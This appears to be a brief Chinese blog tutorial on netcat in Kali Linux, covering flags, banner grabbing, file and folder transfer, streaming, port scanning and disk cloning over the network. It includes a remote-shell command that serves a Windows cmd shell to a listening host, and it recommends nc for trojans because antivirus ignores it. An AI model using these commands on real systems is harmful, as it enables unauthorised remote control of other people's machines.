kali linux之netcat

网络工具中的瑞士军刀----体积小，功能强大

侦听模式/传输模式

telnet/获取banner信息

传输文本信息，文件，目录

加密传输文件，远程控制/木马，加密所有流量（来做远程控制是非常理想的选择，因为杀软不会把nc当成病毒杀掉）

可用作流媒体服务，

远程克隆硬盘，远程电子取证信息收集等

常用参数

-v 显示详细输出内容

-n 不进行dns解析

-l 监听模式

-p 监听端口号

-z 探测相应的端口有没有开放

-u 探测udp的端口开放情况

-q 任务完成退出

实例：

连接123.125.50.29的pop3端口，并且获取了banner信息

nc -lp监听本机的4444端口并把内容写到xxsec.txt中，客户端连接服务端的4444端口，进行远程操作，用作电子取证的时候可以尽量不破坏证据

服务端把接受到的文件重定向到x.txt文件，客户端把xxsec.txt文件传输到目标

也可以服务端准备好发送的文件，建立监听，客户端自定义文件名字连接，即把文件下载到客户端

先用tar命令打包一个文件夹，不用指定名字，然后nc监听本机 -q 1 是数据传输完成后1秒退出，接着客户端nc连接目标，并用tar命令解包， （细节不要忘了  - ）

服务端cat一个视频 管道到nc，客户端连接到服务端，并使用视频播放器播放（mplayer播放器要自行安装）

可用来扫描端口，后面必须指定端口范围

用来克隆硬盘，也可以复制内存，演示就不做了，耗费时间

A：nc -lp 3333 | dd of=/dev/sdb

B：dd if=/dev/sda | nc -nv 192.168.1.10 3333 -q 1

B是被克隆的硬盘，A是要克隆B的硬盘

用来远程控制

正向：

反向：

windows服务端：nc -lp 6666

客户端：nc 192.198.1.11 6666 -c cmd

友情链接 http://www.cnblogs.com/klionsec

http://www.feiyusafe.cn